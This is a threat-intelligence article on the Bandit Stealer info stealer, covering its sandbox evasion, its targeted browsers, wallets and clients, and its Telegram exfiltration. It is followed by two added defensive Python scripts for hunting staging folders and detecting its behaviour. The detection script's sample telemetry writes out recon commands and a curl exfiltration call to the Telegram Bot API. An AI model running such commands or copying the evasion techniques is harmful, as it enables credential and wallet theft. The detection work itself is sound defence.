Zscaler ThreatLabz recently tracked “Bandit Malware,” a new info stealer that appeared in April 2023 and snatched the following data from 17 browsers:-
Cookies
Logins
Credit cards
Bandit Stealer also swipes credentials from popular FTP and email clients, and it goes after desktop cryptocurrency wallets as well.
The malware is written in Go (Golang), and the stolen data is sent to a C2 server through Telegram. Apart from this, the malware can also detect virtual environments and automated analysis tools and quietly evade them.
Bandit Stealer Evades Analysis
The Bandit stealer evades both automated and manual analysis by employing several anti-analysis techniques. It leverages the procfs Golang library to gather process information and scans for the following process names:-
Xen
Vmware
VirtualBox
KVM
Sandbox
QEMU
jail
When a running process matches one of these names, the Bandit info stealer terminates its own execution. The latest Bandit samples also check for the presence of a debugger using the Windows API through the following calls:-
Bandit obtains UUID and screen dimensions by using the following WMIC commands:-
wmic csproduct get uuid
wmic desktopmonitor get screenheight, screenwidth
The gathered information helps the threat actors recognize analysis setups. To spot virtual environments, trick security vendors, and avoid suspicion, the Bandit stealer checks the system against wide blacklists of the following:-
IP addresses
MAC addresses
Computer names
User names
Process names
Bandit fetches the system’s external IP address from ‘api.ipify.org’ and then compares it with a list of blacklisted IP addresses taken from the Appendix.
Bandit retrieves the MAC address via the GetAdaptersAddresses Windows API and checks it against a blacklist from the Appendix. If it matches, Bandit exits; the blacklist may contain MAC addresses linked to virtualization so that sandboxes are avoided.
Apart from this, Bandit Stealer also obtains additional blacklists and uses “cmd /c net session” to verify the username and computer name of the victim.
By employing the CreateToolhelp32Snapshot Windows API, Bandit captures a process snapshot and scans it against a blacklist in the Appendix. If a blacklisted process is found running in memory, Bandit terminates.
Browsers Targeted
Here below we have mentioned all the browsers that are targeted by Bandit Stealer:-
Yandex Browser
Iridium Browser
7Star Browser
Vivaldi Browser
Google Chrome
Orbitum
Sputnik
uCozMedia
Microsoft Edge
Torch Web Browser
Kometa Browser
CentBrowser
BraveSoftware
Amigo Browser
Epic Privacy Browser
SeaMonkey browser
QupZilla
Cryptocurrency Wallets Targeted
Here below we have mentioned all the cryptocurrency wallets that are targeted by Bandit Stealer:-
Coinbase wallet extension
Saturn Wallet extension
Binance chain wallet extension
Coin98 Wallet
TronLink Wallet
multibit Bitcoin
Terra Station
Electron Cash
Guildwallet extension
Electrum-btcp
MetaMask extension
Bither Bitcoin wallet
ronin wallet extension
multidoge coin
Kardiachain wallet extension
LiteCoin
Jaxx liberty Wallet
Dash Wallet
Math Wallet extension
Ethereum
Bitpay wallet extension
Exodus
Nifty Wallet extension
Atomic
Armory
Bytecoin Wallet
Coinomi wallet
Monero wallet
dogecoin
FTP client apps targeted
Here below, we have mentioned all the FTP client applications that Bandit Stealer targets:-
BlazeFTP
NovaFTP
Staff-FTP
EasyFTP
DeluxeFTP
ALFTP
GoFTP
32BitFtp
Email Clients Targeted
Here below we have mentioned all the email clients that the Bandit stealer targets:-
MailSpring
Mailbird
Opera Mail
Pocomail
Stolen data resides in files within a sub-folder of the %appdata%\local directory, and the sub-folder name follows the [country_code][ip_address] format.
The file USERINFO.txt carries the Bandit Stealer header and system information.
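The staging-folder naming scheme above is a usable host-hunting artifact. The following script is an added example (not code from the article or from Zscaler) that scans a given directory for sub-folders named [country_code][ip_address] and reports whether USERINFO.txt is present. It assumes the country code is a two-letter code written directly in front of a dotted IPv4 address (for example "US203.0.113.7"); the directory tree in `demo()` is constructed, and the path you pass to `hunt_staging_dirs()` in practice would be the local application-data folder named in the article.

```python
"""Hunt for Bandit Stealer staging folders under the local app-data directory.

Added example, not code from the original article or from Zscaler. It encodes
the artifact described in the article: a sub-folder named
[country_code][ip_address] (assumed here to be a two-letter country code
immediately followed by a dotted IPv4 address, e.g. "US203.0.113.7") that
holds a USERINFO.txt file.
"""
import ipaddress
import os
import re
import tempfile

# Two letters followed directly by something shaped like an IPv4 address.
_STAGING_DIR_RE = re.compile(r"^(?P<cc>[A-Za-z]{2})(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")


def parse_staging_dir_name(name):
    """Return (country_code, ip) when the folder name matches the Bandit naming
    scheme and the IP part is a valid IPv4 address; otherwise return None."""
    m = _STAGING_DIR_RE.match(name)
    if not m:
        return None
    try:
        ip = ipaddress.IPv4Address(m.group("ip"))
    except ipaddress.AddressValueError:
        return None  # e.g. an octet above 255
    return m.group("cc").upper(), str(ip)


def hunt_staging_dirs(local_appdata):
    """Inspect the top level of the given directory and report folders that match
    the naming scheme; a USERINFO.txt inside raises the confidence."""
    findings = []
    for entry in os.scandir(local_appdata):
        if not entry.is_dir():
            continue
        parsed = parse_staging_dir_name(entry.name)
        if parsed is None:
            continue
        cc, ip = parsed
        has_userinfo = os.path.isfile(os.path.join(entry.path, "USERINFO.txt"))
        findings.append({
            "path": entry.path,
            "country_code": cc,
            "external_ip": ip,
            "confidence": "high" if has_userinfo else "medium",
        })
    return findings


def demo():
    """Build a constructed directory tree and run the hunt against it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "US203.0.113.7"))
        with open(os.path.join(root, "US203.0.113.7", "USERINFO.txt"), "w") as f:
            f.write("constructed sample\n")
        os.makedirs(os.path.join(root, "DE198.51.100.23"))  # no USERINFO.txt
        os.makedirs(os.path.join(root, "Microsoft"))        # benign folder
        os.makedirs(os.path.join(root, "GB999.1.1.1"))      # invalid octet
        return hunt_staging_dirs(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The IP part is validated with `ipaddress` rather than the regex alone so that a folder such as "GB999.1.1.1" is not reported; a match with USERINFO.txt present is rated high, a match without it medium, since the folder name alone could collide with an unrelated application.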
Bandit leverages the cURL utility that ships by default with Windows 10 v1803 to transfer data over several protocols, such as:-
HTTP
FTP
SMTP
Moreover, it downloads the blacklist configuration from a hardcoded URL, abusing “pastebin.com” as a hosting service.
Bandit dispatches this information through Telegram to the threat actor once the data collection concludes.
The Telegram delivery returns a JSON-encoded response, which the threat actor uses for automated parsing and data extraction.
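The host-reconnaissance commands described earlier (the two WMIC queries and “cmd /c net session”) and the cURL-based retrieval and exfiltration described here all surface as process-creation events, so one detection can cover both passages. The following is an added example (not code from the article or from Zscaler) that scores such events per parent process and alerts when the combination is Bandit-like. It assumes Sysmon-style process-creation events already normalised into dicts with the keys host, ts, pid, ppid, image and cmdline; the sample events are constructed, parent PID 4242 stands in for an assumed stealer process, and api.telegram.org is assumed as the Telegram Bot API host.

```python
"""Detect Bandit Stealer's reconnaissance and exfiltration commands in
process-creation telemetry.

Added example, not code from the original article or from Zscaler. Assumes
Sysmon-style process-creation events normalised into dicts with the keys
host, ts, pid, ppid, image and cmdline. All sample events are constructed.
"""
import re
from collections import defaultdict

# Each rule: (name, regex applied to the lower-cased command line, weight).
RULES = [
    ("wmic_uuid",     re.compile(r"wmic\s+csproduct\s+get\s+uuid"), 2),
    ("wmic_screen",   re.compile(r"wmic\s+desktopmonitor\s+get\s+screenheight"), 2),
    ("net_session",   re.compile(r"cmd(\.exe)?\s+/c\s+net\s+session"), 1),
    # Built-in curl reaching the Telegram Bot API (assumed host
    # api.telegram.org) or fetching the blacklist from pastebin.com.
    ("curl_telegram", re.compile(r"curl(\.exe)?\b.*api\.telegram\.org"), 3),
    ("curl_pastebin", re.compile(r"curl(\.exe)?\b.*pastebin\.com"), 2),
]
ALERT_THRESHOLD = 4  # both WMIC probes together reach it; one probe alone does not


def match_rules(event):
    """Return the names of all rules that fire on one event's command line."""
    cmd = event["cmdline"].lower()
    return [name for name, rx, _ in RULES if rx.search(cmd)]


def correlate(events):
    """Group hits by (host, parent PID) so the sequence spawned by one parent is
    scored together; return alerts whose score reaches ALERT_THRESHOLD."""
    weights = {name: w for name, _, w in RULES}
    by_parent = defaultdict(set)
    for ev in events:
        for name in match_rules(ev):
            by_parent[(ev["host"], ev["ppid"])].add(name)
    alerts = []
    for (host, ppid), hits in sorted(by_parent.items()):
        score = sum(weights[h] for h in hits)
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": host, "parent_pid": ppid,
                           "score": score, "hits": sorted(hits)})
    return alerts


# Constructed sample telemetry: a Bandit-like sequence under PPID 4242 on WS01
# and benign administrator activity on WS02.
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": "2023-05-01T10:00:01Z", "pid": 5001, "ppid": 4242,
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic csproduct get uuid"},
    {"host": "WS01", "ts": "2023-05-01T10:00:01Z", "pid": 5002, "ppid": 4242,
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic desktopmonitor get screenheight, screenwidth"},
    {"host": "WS01", "ts": "2023-05-01T10:00:02Z", "pid": 5003, "ppid": 4242,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c net session"},
    {"host": "WS01", "ts": "2023-05-01T10:00:09Z", "pid": 5004, "ppid": 4242,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -s https://pastebin.com/raw/PLACEHOLDER"},
    {"host": "WS01", "ts": "2023-05-01T10:00:20Z", "pid": 5005, "ppid": 4242,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://api.telegram.org/botPLACEHOLDER/sendDocument"},
    # An administrator reading a machine's UUID once from an interactive shell.
    {"host": "WS02", "ts": "2023-05-01T11:00:00Z", "pid": 6001, "ppid": 1300,
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic csproduct get uuid"},
    {"host": "WS02", "ts": "2023-05-01T11:00:05Z", "pid": 6002, "ppid": 1300,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -O https://example.com/tool.zip"},
]


def run_sample():
    """Run the correlation over the constructed events."""
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Scoring per parent process rather than per event is what keeps the single administrative `wmic csproduct get uuid` on WS02 below the threshold while the burst of probes under one parent on WS01 is alerted; in a real pipeline the grouping key would also carry a time window so that unrelated children of a long-lived shell are not merged.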